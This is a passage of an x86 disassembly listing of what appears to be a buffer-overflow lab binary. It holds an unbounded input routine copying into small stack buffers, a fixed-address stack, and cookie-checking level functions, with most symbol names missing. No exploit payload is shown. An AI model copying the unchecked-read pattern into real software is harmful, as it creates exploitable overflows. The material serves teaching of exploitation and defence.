8048b33: e8 f8 fc ff ff call 8048830 347 | 8048b38: c7 04 24 84 9f 04 08 movl $0x8049f84,(%esp) 348 | 8048b3f: e8 ec fc ff ff call 8048830 349 | 8048b44: c7 04 24 00 00 00 00 movl $0x0,(%esp) 350 | 8048b4b: e8 00 fd ff ff call 8048850 351 | 352 | 08048b50 : 353 | 8048b50: 55 push %ebp 354 | 8048b51: 89 e5 mov %esp,%ebp 355 | 8048b53: 83 ec 18 sub $0x18,%esp 356 | 8048b56: c7 04 24 17 a1 04 08 movl $0x804a117,(%esp) 357 | 8048b5d: e8 ce fc ff ff call 8048830 358 | 8048b62: c7 04 24 00 00 00 00 movl $0x0,(%esp) 359 | 8048b69: e8 f4 05 00 00 call 8049162 360 | 8048b6e: c7 04 24 00 00 00 00 movl $0x0,(%esp) 361 | 8048b75: e8 d6 fc ff ff call 8048850 362 | 363 | 08048b7a : 364 | 8048b7a: 55 push %ebp 365 | 8048b7b: 89 e5 mov %esp,%ebp 366 | 8048b7d: 83 ec 18 sub $0x18,%esp 367 | 8048b80: 8b 45 08 mov 0x8(%ebp),%eax 368 | 8048b83: 3b 05 08 d1 04 08 cmp 0x804d108,%eax 369 | 8048b89: 75 1e jne 8048ba9 370 | 8048b8b: 89 44 24 04 mov %eax,0x4(%esp) 371 | 8048b8f: c7 04 24 32 a1 04 08 movl $0x804a132,(%esp) 372 | 8048b96: e8 f5 fb ff ff call 8048790 373 | 8048b9b: c7 04 24 01 00 00 00 movl $0x1,(%esp) 374 | 8048ba2: e8 bb 05 00 00 call 8049162 375 | 8048ba7: eb 10 jmp 8048bb9 376 | 8048ba9: 89 44 24 04 mov %eax,0x4(%esp) 377 | 8048bad: c7 04 24 ac 9f 04 08 movl $0x8049fac,(%esp) 378 | 8048bb4: e8 d7 fb ff ff call 8048790 379 | 8048bb9: c7 04 24 00 00 00 00 movl $0x0,(%esp) 380 | 8048bc0: e8 8b fc ff ff call 8048850 381 | 382 | 08048bc5 : 383 | 8048bc5: 55 push %ebp 384 | 8048bc6: 89 e5 mov %esp,%ebp 385 | 8048bc8: 83 ec 18 sub $0x18,%esp 386 | 8048bcb: a1 00 d1 04 08 mov 0x804d100,%eax 387 | 8048bd0: 3b 05 08 d1 04 08 cmp 0x804d108,%eax 388 | 8048bd6: 75 1e jne 8048bf6 389 | 8048bd8: 89 44 24 04 mov %eax,0x4(%esp) 390 | 8048bdc: c7 04 24 cc 9f 04 08 movl $0x8049fcc,(%esp) 391 | 8048be3: e8 a8 fb ff ff call 8048790 392 | 8048be8: c7 04 24 02 00 00 00 movl $0x2,(%esp) 393 | 8048bef: e8 6e 05 00 00 call 8049162 394 | 8048bf4: eb 10 jmp 8048c06 395 | 8048bf6: 89 44 24 04 mov %eax,0x4(%esp) 396 | 8048bfa: c7 04 24 50 a1 04 08 movl $0x804a150,(%esp) 397 | 8048c01: e8 8a fb ff ff call 8048790 398 | 8048c06: c7 04 24 00 00 00 00 movl $0x0,(%esp) 399 | 8048c0d: e8 3e fc ff ff call 8048850 400 | 401 | 08048c12 : 402 | 8048c12: 55 push %ebp 403 | 8048c13: 89 e5 mov %esp,%ebp 404 | 8048c15: 57 push %edi 405 | 8048c16: 56 push %esi 406 | 8048c17: 53 push %ebx 407 | 8048c18: 83 ec 1c sub $0x1c,%esp 408 | 8048c1b: 8b 75 08 mov 0x8(%ebp),%esi 409 | 8048c1e: c7 05 fc d0 04 08 00 movl $0x0,0x804d0fc 410 | 8048c25: 00 00 00 411 | 8048c28: 89 f3 mov %esi,%ebx 412 | 8048c2a: eb 49 jmp 8048c75 413 | 8048c2c: 83 c3 01 add $0x1,%ebx 414 | 8048c2f: 88 53 ff mov %dl,-0x1(%ebx) 415 | 8048c32: a1 fc d0 04 08 mov 0x804d0fc,%eax 416 | 8048c37: 3d ff 03 00 00 cmp $0x3ff,%eax 417 | 8048c3c: 7f 37 jg 8048c75 418 | 8048c3e: 8d 3c 40 lea (%eax,%eax,2),%edi 419 | 8048c41: 89 d1 mov %edx,%ecx 420 | 8048c43: c0 e9 04 shr $0x4,%cl 421 | 8048c46: 0f be c9 movsbl %cl,%ecx 422 | 8048c49: 0f b6 89 2c a2 04 08 movzbl 0x804a22c(%ecx),%ecx 423 | 8048c50: 88 8f 40 d1 04 08 mov %cl,0x804d140(%edi) 424 | 8048c56: 83 e2 0f and $0xf,%edx 425 | 8048c59: 0f b6 92 2c a2 04 08 movzbl 0x804a22c(%edx),%edx 426 | 8048c60: 88 97 41 d1 04 08 mov %dl,0x804d141(%edi) 427 | 8048c66: c6 87 42 d1 04 08 20 movb $0x20,0x804d142(%edi) 428 | 8048c6d: 83 c0 01 add $0x1,%eax 429 | 8048c70: a3 fc d0 04 08 mov %eax,0x804d0fc 430 | 8048c75: a1 0c d1 04 08 mov 0x804d10c,%eax 431 | 8048c7a: 89 04 24 mov %eax,(%esp) 432 | 8048c7d: e8 4e fb ff ff call 80487d0 <_IO_getc@plt> 433 | 8048c82: 89 c2 mov %eax,%edx 434 | 8048c84: 83 f8 ff cmp $0xffffffff,%eax 435 | 8048c87: 74 05 je 8048c8e 436 | 8048c89: 83 f8 0a cmp $0xa,%eax 437 | 8048c8c: 75 9e jne 8048c2c 438 | 8048c8e: c6 03 00 movb $0x0,(%ebx) 439 | 8048c91: a1 fc d0 04 08 mov 0x804d0fc,%eax 440 | 8048c96: c6 84 40 40 d1 04 08 movb $0x0,0x804d140(%eax,%eax,2) 441 | 8048c9d: 00 442 | 8048c9e: 89 f0 mov %esi,%eax 443 | 8048ca0: 83 c4 1c add $0x1c,%esp 444 | 8048ca3: 5b pop %ebx 445 | 8048ca4: 5e pop %esi 446 | 8048ca5: 5f pop %edi 447 | 8048ca6: 5d pop %ebp 448 | 8048ca7: c3 ret 449 | 450 | 08048ca8 : 451 | 8048ca8: 55 push %ebp 452 | 8048ca9: 89 e5 mov %esp,%ebp 453 | 8048cab: 83 ec 18 sub $0x18,%esp 454 | 8048cae: e8 5d fb ff ff call 8048810 455 | 8048cb3: 89 04 24 mov %eax,(%esp) 456 | 8048cb6: e8 c5 fa ff ff call 8048780 457 | 8048cbb: e8 70 fc ff ff call 8048930 458 | 8048cc0: c9 leave 459 | 8048cc1: c3 ret 460 | 461 | 08048cc2 : 462 | 8048cc2: 55 push %ebp 463 | 8048cc3: 89 e5 mov %esp,%ebp 464 | 8048cc5: 53 push %ebx 465 | 8048cc6: 83 ec 24 sub $0x24,%esp 466 | 8048cc9: e8 da ff ff ff call 8048ca8 467 | 8048cce: 89 45 f4 mov %eax,-0xc(%ebp) 468 | 8048cd1: e8 c7 03 00 00 call 804909d 469 | 8048cd6: 89 c3 mov %eax,%ebx 470 | 8048cd8: e8 cb ff ff ff call 8048ca8 471 | 8048cdd: 8b 55 f4 mov -0xc(%ebp),%edx 472 | 8048ce0: 39 d0 cmp %edx,%eax 473 | 8048ce2: 74 0e je 8048cf2 474 | 8048ce4: c7 04 24 f4 9f 04 08 movl $0x8049ff4,(%esp) 475 | 8048ceb: e8 40 fb ff ff call 8048830 476 | 8048cf0: eb 36 jmp 8048d28 477 | 8048cf2: 3b 1d 08 d1 04 08 cmp 0x804d108,%ebx 478 | 8048cf8: 75 1e jne 8048d18 479 | 8048cfa: 89 5c 24 04 mov %ebx,0x4(%esp) 480 | 8048cfe: c7 04 24 6e a1 04 08 movl $0x804a16e,(%esp) 481 | 8048d05: e8 86 fa ff ff call 8048790 482 | 8048d0a: c7 04 24 03 00 00 00 movl $0x3,(%esp) 483 | 8048d11: e8 4c 04 00 00 call 8049162 484 | 8048d16: eb 10 jmp 8048d28 485 | 8048d18: 89 5c 24 04 mov %ebx,0x4(%esp) 486 | 8048d1c: c7 04 24 8b a1 04 08 movl $0x804a18b,(%esp) 487 | 8048d23: e8 68 fa ff ff call 8048790 488 | 8048d28: 83 c4 24 add $0x24,%esp 489 | 8048d2b: 5b pop %ebx 490 | 8048d2c: 5d pop %ebp 491 | 8048d2d: c3 ret 492 | 493 | 08048d2e : 494 | 8048d2e: 55 push %ebp 495 | 8048d2f: 89 e5 mov %esp,%ebp 496 | 8048d31: 53 push %ebx 497 | 8048d32: 83 ec 24 sub $0x24,%esp 498 | 8048d35: e8 6e ff ff ff call 8048ca8 499 | 8048d3a: 89 45 f4 mov %eax,-0xc(%ebp) 500 | 8048d3d: e8 73 03 00 00 call 80490b5 501 | 8048d42: 89 c3 mov %eax,%ebx 502 | 8048d44: e8 5f ff ff ff call 8048ca8 503 | 8048d49: 8b 55 f4 mov -0xc(%ebp),%edx 504 | 8048d4c: 39 d0 cmp %edx,%eax 505 | 8048d4e: 74 0e je 8048d5e 506 | 8048d50: c7 04 24 f4 9f 04 08 movl $0x8049ff4,(%esp) 507 | 8048d57: e8 d4 fa ff ff call 8048830 508 | 8048d5c: eb 36 jmp 8048d94 509 | 8048d5e: 3b 1d 08 d1 04 08 cmp 0x804d108,%ebx 510 | 8048d64: 75 1e jne 8048d84 511 | 8048d66: 89 5c 24 04 mov %ebx,0x4(%esp) 512 | 8048d6a: c7 04 24 20 a0 04 08 movl $0x804a020,(%esp) 513 | 8048d71: e8 1a fa ff ff call 8048790 514 | 8048d76: c7 04 24 04 00 00 00 movl $0x4,(%esp) 515 | 8048d7d: e8 e0 03 00 00 call 8049162 516 | 8048d82: eb 10 jmp 8048d94 517 | 8048d84: 89 5c 24 04 mov %ebx,0x4(%esp) 518 | 8048d88: c7 04 24 a6 a1 04 08 movl $0x804a1a6,(%esp) 519 | 8048d8f: e8 fc f9 ff ff call 8048790 520 | 8048d94: 83 c4 24 add $0x24,%esp 521 | 8048d97: 5b pop %ebx 522 | 8048d98: 5d pop %ebp 523 | 8048d99: c3 ret 524 | 525 | 08048d9a : 526 | 8048d9a: 55 push %ebp 527 | 8048d9b: 89 e5 mov %esp,%ebp 528 | 8048d9d: 53 push %ebx 529 | 8048d9e: 83 ec 54 sub $0x54,%esp 530 | 8048da1: 89 c3 mov %eax,%ebx 531 | 8048da3: 8d 4d b8 lea -0x48(%ebp),%ecx 532 | 8048da6: 81 e1 f0 3f 00 00 and $0x3ff0,%ecx 533 | 8048dac: 8d 44 11 1e lea 0x1e(%ecx,%edx,1),%eax 534 | 8048db0: 83 e0 f0 and $0xfffffff0,%eax 535 | 8048db3: 29 c4 sub %eax,%esp 536 | 8048db5: 8d 44 24 1b lea 0x1b(%esp),%eax 537 | 8048db9: 83 e0 f0 and $0xfffffff0,%eax 538 | 8048dbc: 89 4c 24 08 mov %ecx,0x8(%esp) 539 | 8048dc0: c7 44 24 04 f4 00 00 movl $0xf4,0x4(%esp) 540 | 8048dc7: 00 541 | 8048dc8: 89 04 24 mov %eax,(%esp) 542 | 8048dcb: e8 f0 fa ff ff call 80488c0 543 | 8048dd0: c7 04 24 c2 a1 04 08 movl $0x804a1c2,(%esp) 544 | 8048dd7: e8 b4 f9 ff ff call 8048790 545 | 8048ddc: 85 db test %ebx,%ebx 546 | 8048dde: 74 07 je 8048de7 547 | 8048de0: e8 49 ff ff ff call 8048d2e 548 | 8048de5: eb 05 jmp 8048dec 549 | 8048de7: e8 d6 fe ff ff call 8048cc2 550 | 8048dec: 83 3d 04 d1 04 08 00 cmpl $0x0,0x804d104 551 | 8048df3: 75 16 jne 8048e0b 552 | 8048df5: c7 04 24 b4 a0 04 08 movl $0x804a0b4,(%esp) 553 | 8048dfc: e8 2f fa ff ff call 8048830 554 | 8048e01: c7 05 04 d1 04 08 00 movl $0x0,0x804d104 555 | 8048e08: 00 00 00 556 | 8048e0b: 8b 5d fc mov -0x4(%ebp),%ebx 557 | 8048e0e: c9 leave 558 | 8048e0f: c3 ret 559 | 560 | 08048e10 : 561 | 8048e10: 55 push %ebp 562 | 8048e11: 89 e5 mov %esp,%ebp 563 | 8048e13: 83 ec 28 sub $0x28,%esp 564 | 8048e16: 8b 45 08 mov 0x8(%ebp),%eax 565 | 8048e19: a3 f8 d0 04 08 mov %eax,0x804d0f8 566 | 8048e1e: 8b 45 0c mov 0xc(%ebp),%eax 567 | 8048e21: a3 f4 d0 04 08 mov %eax,0x804d0f4 568 | 8048e26: c7 44 24 14 00 00 00 movl $0x0,0x14(%esp) 569 | 8048e2d: 00 570 | 8048e2e: c7 44 24 10 00 00 00 movl $0x0,0x10(%esp) 571 | 8048e35: 00 572 | 8048e36: c7 44 24 0c 32 01 00 movl $0x132,0xc(%esp) 573 | 8048e3d: 00 574 | 8048e3e: c7 44 24 08 07 00 00 movl $0x7,0x8(%esp) 575 | 8048e45: 00 576 | 8048e46: c7 44 24 04 00 00 10 movl $0x100000,0x4(%esp) 577 | 8048e4d: 00 578 | 8048e4e: c7 04 24 00 60 58 55 movl $0x55586000,(%esp) 579 | 8048e55: e8 16 fa ff ff call 8048870 580 | 8048e5a: 3d 00 60 58 55 cmp $0x55586000,%eax 581 | 8048e5f: 74 31 je 8048e92 582 | 8048e61: a1 e0 d0 04 08 mov 0x804d0e0,%eax 583 | 8048e66: 89 44 24 0c mov %eax,0xc(%esp) 584 | 8048e6a: c7 44 24 08 47 00 00 movl $0x47,0x8(%esp) 585 | 8048e71: 00 586 | 8048e72: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp) 587 | 8048e79: 00 588 | 8048e7a: c7 04 24 40 a0 04 08 movl $0x804a040,(%esp) 589 | 8048e81: e8 5a f9 ff ff call 80487e0 590 | 8048e86: c7 04 24 01 00 00 00 movl $0x1,(%esp) 591 | 8048e8d: e8 be f9 ff ff call 8048850 592 | 8048e92: c7 05 20 d1 04 08 f8 movl $0x55685ff8,0x804d120 593 | 8048e99: 5f 68 55 594 | 8048e9c: ba f8 5f 68 55 mov $0x55685ff8,%edx 595 | 8048ea1: 89 e0 mov %esp,%eax 596 | 8048ea3: 89 d4 mov %edx,%esp 597 | 8048ea5: 89 c2 mov %eax,%edx 598 | 8048ea7: 89 15 f0 d0 04 08 mov %edx,0x804d0f0 599 | 8048ead: 8b 15 f4 d0 04 08 mov 0x804d0f4,%edx 600 | 8048eb3: a1 f8 d0 04 08 mov 0x804d0f8,%eax 601 | 8048eb8: e8 dd fe ff ff call 8048d9a 602 | 8048ebd: a1 f0 d0 04 08 mov 0x804d0f0,%eax 603 | 8048ec2: 89 c4 mov %eax,%esp 604 | 8048ec4: c7 44 24 04 00 00 10 movl $0x100000,0x4(%esp) 605 | 8048ecb: 00 606 | 8048ecc: c7 04 24 00 60 58 55 movl $0x55586000,(%esp) 607 | 8048ed3: e8 28 fa ff ff call 8048900 608 | 8048ed8: c9 leave 609 | 8048ed9: c3 ret 610 | 611 | 08048eda
: 612 | 8048eda: 55 push %ebp 613 | 8048edb: 89 e5 mov %esp,%ebp 614 | 8048edd: 57 push %edi 615 | 8048ede: 56 push %esi 616 | 8048edf: 53 push %ebx 617 | 8048ee0: 83 e4 f0 and $0xfffffff0,%esp 618 | 8048ee3: 83 ec 20 sub $0x20,%esp 619 | 8048ee6: 8b 75 08 mov 0x8(%ebp),%esi 620 | 8048ee9: 8b 5d 0c mov 0xc(%ebp),%ebx 621 | 8048eec: c7 44 24 04 aa 8a 04 movl $0x8048aaa,0x4(%esp) 622 | 8048ef3: 08 623 | 8048ef4: c7 04 24 0b 00 00 00 movl $0xb,(%esp) 624 | 8048efb: e8 b0 f8 ff ff call 80487b0 625 | 8048f00: c7 44 24 04 80 8a 04 movl $0x8048a80,0x4(%esp) 626 | 8048f07: 08 627 | 8048f08: c7 04 24 07 00 00 00 movl $0x7,(%esp) 628 | 8048f0f: e8 9c f8 ff ff call 80487b0 629 | 8048f14: c7 44 24 04 d4 8a 04 movl $0x8048ad4,0x4(%esp) 630 | 8048f1b: 08 631 | 8048f1c: c7 04 24 04 00 00 00 movl $0x4,(%esp) 632 | 8048f23: e8 88 f8 ff ff call 80487b0 633 | 8048f28: a1 e4 d0 04 08 mov 0x804d0e4,%eax 634 | 8048f2d: a3 0c d1 04 08 mov %eax,0x804d10c 635 | 8048f32: bf 01 00 00 00 mov $0x1,%edi 636 | 8048f37: c7 44 24 1c 00 00 00 movl $0x0,0x1c(%esp) 637 | 8048f3e: 00 638 | 8048f3f: eb 67 jmp 8048fa8 639 | 8048f41: 83 e8 67 sub $0x67,%eax 640 | 8048f44: 3c 0e cmp $0xe,%al 641 | 8048f46: 77 59 ja 8048fa1 642 | 8048f48: 0f b6 c0 movzbl %al,%eax 643 | 8048f4b: ff 24 85 f0 a1 04 08 jmp *0x804a1f0(,%eax,4) 644 | 8048f52: c7 44 24 1c 01 00 00 movl $0x1,0x1c(%esp) 645 | 8048f59: 00 646 | 8048f5a: bf 05 00 00 00 mov $0x5,%edi 647 | 8048f5f: eb 47 jmp 8048fa8 648 | 8048f61: 8b 03 mov (%ebx),%eax 649 | 8048f63: e8 96 fb ff ff call 8048afe 650 | 8048f68: a1 e8 d0 04 08 mov 0x804d0e8,%eax 651 | 8048f6d: 89 04 24 mov %eax,(%esp) 652 | 8048f70: e8 5b f9 ff ff call 80488d0 <__strdup@plt> 653 | 8048f75: a3 18 d1 04 08 mov %eax,0x804d118 654 | 8048f7a: 89 04 24 mov %eax,(%esp) 655 | 8048f7d: e8 7c 0e 00 00 call 8049dfe 656 | 8048f82: a3 08 d1 04 08 mov %eax,0x804d108 657 | 8048f87: eb 1f jmp 8048fa8 658 | 8048f89: c7 05 14 d1 04 08 01 movl $0x1,0x804d114 659 | 8048f90: 00 00 00 660 | 8048f93: eb 13 jmp 8048fa8 661 | 8048f95: c7 05 10 d1 04 08 01 movl $0x1,0x804d110 662 | 8048f9c: 00 00 00 663 | 8048f9f: eb 07 jmp 8048fa8 664 | 8048fa1: 8b 03 mov (%ebx),%eax 665 | 8048fa3: e8 56 fb ff ff call 8048afe 666 | 8048fa8: c7 44 24 08 cf a1 04 movl $0x804a1cf,0x8(%esp) 667 | 8048faf: 08 668 | 8048fb0: 89 5c 24 04 mov %ebx,0x4(%esp) 669 | 8048fb4: 89 34 24 mov %esi,(%esp) 670 | 8048fb7: e8 e4 f8 ff ff call 80488a0 671 | 8048fbc: 3c ff cmp $0xff,%al 672 | 8048fbe: 75 81 jne 8048f41 673 | 8048fc0: 83 3d 18 d1 04 08 00 cmpl $0x0,0x804d118 674 | 8048fc7: 75 19 jne 8048fe2 675 | 8048fc9: 8b 03 mov (%ebx),%eax 676 | 8048fcb: 89 44 24 04 mov %eax,0x4(%esp) 677 | 8048fcf: c7 04 24 88 a0 04 08 movl $0x804a088,(%esp) 678 | 8048fd6: e8 b5 f7 ff ff call 8048790 679 | 8048fdb: 8b 03 mov (%ebx),%eax 680 | 8048fdd: e8 1c fb ff ff call 8048afe 681 | 8048fe2: e8 ec 00 00 00 call 80490d3 682 | 8048fe7: a1 18 d1 04 08 mov 0x804d118,%eax 683 | 8048fec: 89 44 24 04 mov %eax,0x4(%esp) 684 | 8048ff0: c7 04 24 d6 a1 04 08 movl $0x804a1d6,(%esp) 685 | 8048ff7: e8 94 f7 ff ff call 8048790 686 | 8048ffc: a1 08 d1 04 08 mov 0x804d108,%eax 687 | 8049001: 89 44 24 04 mov %eax,0x4(%esp) 688 | 8049005: c7 04 24 e2 a1 04 08 movl $0x804a1e2,(%esp) 689 | 804900c: e8 7f f7 ff ff call 8048790 690 | 8049011: a1 08 d1 04 08 mov 0x804d108,%eax 691 | 8049016: 89 04 24 mov %eax,(%esp) 692 | 8049019: e8 62 f7 ff ff call 8048780 693 | 804901e: e8 0d f9 ff ff call 8048930 694 | 8049023: 25 f0 0f 00 00 and $0xff0,%eax 695 | 8049028: 05 00 01 00 00 add $0x100,%eax 696 | 804902d: 89 44 24 18 mov %eax,0x18(%esp) 697 | 8049031: c7 44 24 04 04 00 00 movl $0x4,0x4(%esp) 698 | 8049038: 00 699 | 8049039: 89 3c 24 mov %edi,(%esp) 700 | 804903c: e8 2f f9 ff ff call 8048970 701 | 8049041: 89 c6 mov %eax,%esi 702 | 8049043: c7 00 00 00 00 00 movl $0x0,(%eax) 703 | 8049049: bb 01 00 00 00 mov $0x1,%ebx 704 | 804904e: eb 17 jmp 8049067 705 | 8049050: e8 db f8 ff ff call 8048930 706 | 8049055: 25 f0 00 00 00 and $0xf0,%eax 707 | 804905a: ba 80 00 00 00 mov $0x80,%edx 708 | 804905f: 29 c2 sub %eax,%edx 709 | 8049061: 89 14 9e mov %edx,(%esi,%ebx,4) 710 | 8049064: 83 c3 01 add $0x1,%ebx 711 | 8049067: 39 fb cmp %edi,%ebx 712 | 8049069: 7c e5 jl 8049050 713 | 804906b: bb 00 00 00 00 mov $0x0,%ebx 714 | 8049070: eb 1a jmp 804908c 715 | 8049072: 8b 44 24 18 mov 0x18(%esp),%eax 716 | 8049076: 03 04 9e add (%esi,%ebx,4),%eax 717 | 8049079: 89 44 24 04 mov %eax,0x4(%esp) 718 | 804907d: 8b 44 24 1c mov 0x1c(%esp),%eax 719 | 8049081: 89 04 24 mov %eax,(%esp) 720 | 8049084: e8 87 fd ff ff call 8048e10 721 | 8049089: 83 c3 01 add $0x1,%ebx 722 | 804908c: 39 fb cmp %edi,%ebx 723 | 804908e: 7c e2 jl 8049072 724 | 8049090: b8 00 00 00 00 mov $0x0,%eax 725 | 8049095: 8d 65 f4 lea -0xc(%ebp),%esp 726 | 8049098: 5b pop %ebx 727 | 8049099: 5e pop %esi 728 | 804909a: 5f pop %edi 729 | 804909b: 5d pop %ebp 730 | 804909c: c3 ret 731 | 732 | 0804909d : 733 | 804909d: 55 push %ebp 734 | 804909e: 89 e5 mov %esp,%ebp 735 | 80490a0: 83 ec 38 sub $0x38,%esp 736 | 80490a3: 8d 45 d8 lea -0x28(%ebp),%eax 737 | 80490a6: 89 04 24 mov %eax,(%esp) 738 | 80490a9: e8 64 fb ff ff call 8048c12 739 | 80490ae: b8 01 00 00 00 mov $0x1,%eax 740 | 80490b3: c9 leave 741 | 80490b4: c3 ret 742 | 743 | 080490b5 : 744 | 80490b5: 55 push %ebp 745 | 80490b6: 89 e5 mov %esp,%ebp 746 | 80490b8: 81 ec 18 02 00 00 sub $0x218,%esp 747 | 80490be: 8d 85 f8 fd ff ff lea -0x208(%ebp),%eax 748 | 80490c4: 89 04 24 mov %eax,(%esp) 749 | 80490c7: e8 46 fb ff ff call 8048c12 750 | 80490cc: b8 01 00 00 00 mov $0x1,%eax 751 | 80490d1: c9 leave 752 | 80490d2: c3 ret 753 | 754 | 080490d3 : 755 | 80490d3: 55 push %ebp 756 | 80490d4: 89 e5 mov %esp,%ebp 757 | 80490d6: 81 ec 18 24 00 00 sub $0x2418,%esp 758 | 80490dc: 83 3d 10 d1 04 08 00 cmpl $0x0,0x804d110 759 | 80490e3: 74 0c je 80490f1 760 | 80490e5: c7 04 24 ff ff ff ff movl $0xffffffff,(%esp) 761 | 80490ec: e8 3c 0a 00 00 call 8049b2d 762 | 80490f1: 83 3d 14 d1 04 08 00 cmpl $0x0,0x804d114 763 | 80490f8: 74 66 je 8049160 764 | 80490fa: c7 44 24 04 00 04 00 movl $0x400,0x4(%esp) 765 | 8049101: 00 766 | 8049102: 8d 85 f8 fb ff ff lea -0x408(%ebp),%eax 767 | 8049108: 89 04 24 mov %eax,(%esp) 768 | 804910b: e8 10 f7 ff ff call 8048820 769 | 8049110: 85 c0 test %eax,%eax 770 | 8049112: 74 18 je 804912c 771 | 8049114: c7 04 24 3c a2 04 08 movl $0x804a23c,(%esp) 772 | 804911b: e8 10 f7 ff ff call 8048830 773 | 8049120: c7 04 24 08 00 00 00 movl $0x8,(%esp) 774 | 8049127: e8 24 f7 ff ff call 8048850 775 | 804912c: 8d 85 f8 db ff ff lea -0x2408(%ebp),%eax 776 | 8049132: 89 04 24 mov %eax,(%esp) 777 | 8049135: e8 2d 0a 00 00 call 8049b67 778 | 804913a: 85 c0 test %eax,%eax 779 | 804913c: 79 22 jns 8049160 780 | 804913e: 8d 85 f8 db ff ff lea -0x2408(%ebp),%eax 781 | 8049144: 89 44 24 04 mov %eax,0x4(%esp) 782 | 8049148: c7 04 24 6e a3 04 08 movl $0x804a36e,(%esp) 783 | 804914f: e8 3c f6 ff ff call 8048790 784 | 8049154: c7 04 24 08 00 00 00 movl $0x8,(%esp) 785 | 804915b: e8 f0 f6 ff ff call 8048850 786 | 8049160: c9 leave 787 | 8049161: c3 ret 788 | 789 | 08049162 : 790 | 8049162: 55 push %ebp 791 | 8049163: 89 e5 mov %esp,%ebp 792 | 8049165: 57 push %edi 793 | 8049166: 53 push %ebx 794 | 8049167: 81 ec 20 40 00 00 sub $0x4020,%esp 795 | 804916d: 8b 5d 08 mov 0x8(%ebp),%ebx 796 | 8049170: 83 3d 18 d1 04 08 00 cmpl $0x0,0x804d118 797 | 8049177: 75 11 jne 804918a 798 | 8049179: c7 04 24 74 a2 04 08 movl $0x804a274,(%esp) 799 | 8049180: e8 ab f6 ff ff call 8048830 800 | 8049185: e9 14 01 00 00 jmp 804929e 801 | 804918a: 83 fb 04 cmp $0x4,%ebx 802 | 804918d: 76 11 jbe 80491a0 803 | 804918f: c7 04 24 a0 a2 04 08 movl $0x804a2a0,(%esp) 804 | 8049196: e8 95 f6 ff ff call 8048830 805 | 804919b: e9 fe 00 00 00 jmp 804929e 806 | 80491a0: c7 05 04 d1 04 08 01 movl $0x1,0x804d104 807 | 80491a7: 00 00 00 808 | 80491aa: 8b 04 9d c0 c0 04 08 mov 0x804c0c0(,%ebx,4),%eax 809 | 80491b1: 83 e8 01 sub $0x1,%eax 810 | 80491b4: 89 04 9d c0 c0 04 08 mov %eax,0x804c0c0(,%ebx,4) 811 | 80491bb: 85 c0 test %eax,%eax 812 | 80491bd: 7e 11 jle 80491d0 813 | 80491bf: c7 04 24 83 a3 04 08 movl $0x804a383,(%esp) 814 | 80491c6: e8 65 f6 ff ff call 8048830 815 | 80491cb: e9 ce 00 00 00 jmp 804929e 816 | 80491d0: c7 04 24 8e a3 04 08 movl $0x804a38e,(%esp) 817 | 80491d7: e8 54 f6 ff ff call 8048830 818 | 80491dc: 83 3d 14 d1 04 08 00 cmpl $0x0,0x804d114 819 | 80491e3: 0f 84 a9 00 00 00 je 8049292 820 | 80491e9: bf 40 d1 04 08 mov $0x804d140,%edi 821 | 80491ee: b8 00 00 00 00 mov $0x0,%eax 822 | 80491f3: b9 ff ff ff ff mov $0xffffffff,%ecx 823 | 80491f8: f2 ae repnz scas %es:(%edi),%al 824 | 80491fa: 89 ca mov %ecx,%edx 825 | 80491fc: f7 d2 not %edx 826 | 80491fe: 89 d1 mov %edx,%ecx 827 | 8049200: 83 c1 1f add $0x1f,%ecx 828 | 8049203: 81 f9 00 20 00 00 cmp $0x2000,%ecx 829 | 8049209: 76 11 jbe 804921c 830 | 804920b: c7 04 24 c8 a2 04 08 movl $0x804a2c8,(%esp) 831 | 8049212: e8 19 f6 ff ff call 8048830 832 | 8049217: e9 82 00 00 00 jmp 804929e 833 | 804921c: c7 44 24 10 40 d1 04 movl $0x804d140,0x10(%esp) 834 | 8049223: 08 835 | 8049224: a1 08 d1 04 08 mov 0x804d108,%eax 836 | 8049229: 89 44 24 0c mov %eax,0xc(%esp) 837 | 804922d: 89 5c 24 08 mov %ebx,0x8(%esp) 838 | 8049231: c7 44 24 04 94 a3 04 movl $0x804a394,0x4(%esp) 839 | 8049238: 08 840 | 8049239: 8d 9d f8 df ff ff lea -0x2008(%ebp),%ebx 841 | 804923f: 89 1c 24 mov %ebx,(%esp) 842 | 8049242: e8 c9 f6 ff ff call 8048910 843 | 8049247: 8d 85 f8 bf ff ff lea -0x4008(%ebp),%eax 844 | 804924d: 89 44 24 0c mov %eax,0xc(%esp) 845 | 8049251: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp) 846 | 8049258: 00 847 | 8049259: 89 5c 24 04 mov %ebx,0x4(%esp) 848 | 804925d: a1 18 d1 04 08 mov 0x804d118,%eax 849 | 8049262: 89 04 24 mov %eax,(%esp) 850 | 8049265: e8 9a 0a 00 00 call 8049d04 851 | 804926a: 85 c0 test %eax,%eax 852 | 804926c: 75 0e jne 804927c 853 | 804926e: c7 04 24 00 a3 04 08 movl $0x804a300,(%esp) 854 | 8049275: e8 b6 f5 ff ff call 8048830 855 | 804927a: eb 16 jmp 8049292 856 | 804927c: 8d 85 f8 bf ff ff lea -0x4008(%ebp),%eax 857 | 8049282: 89 44 24 04 mov %eax,0x4(%esp) 858 | 8049286: c7 04 24 30 a3 04 08 movl $0x804a330,(%esp) 859 | 804928d: e8 fe f4 ff ff call 8048790 860 | 8049292: c7 04 24 9d a3 04 08 movl $0x804a39d,(%esp) 861 | 8049299: e8 92 f5 ff ff call 8048830 862 | 804929e: 81 c4 20 40 00 00 add $0x4020,%esp 863 | 80492a4: 5b pop %ebx 864 | 80492a5: 5f pop %edi 865 | 80492a6: 5d pop %ebp 866 | 80492a7: c3 ret 867 | 80492a8: 66 90 xchg %ax,%ax 868 | 80492aa: 66 90 xchg %ax,%ax 869 | 80492ac: 66 90 xchg %ax,%ax 870 | 80492ae: 66 90 xchg %ax,%ax 871 | 872 | 080492b0 : 873 | 80492b0: 55 push %ebp 874 | 80492b1: 89 e5 mov %esp,%ebp 875 | 80492b3: 83 ec 18 sub $0x18,%esp 876 | 80492b6: c7 44 24 04 02 00 00 movl $0x2,0x4(%esp) 877 | 80492bd: 00 878 | 80492be: c7 04 24 b4 a3 04 08 movl $0x804a3b4,(%esp) 879 | 80492c5: e8 c6 f4 ff ff call 8048790 880 | 80492ca: c7 04 24 01 00 00 00 movl $0x1,(%esp) 881 | 80492d1: e8 7a f5 ff ff call 8048850 882 | 883 | 080492d6 : 884 | 80492d6: 55 push %ebp 885 | 80492d7: 89 e5 mov %esp,%ebp 886 | 80492d9: 57 push %edi 887 | 80492da: 56 push %esi 888 | 80492db: 53 push %ebx 889 | 80492dc: 83 ec 3c 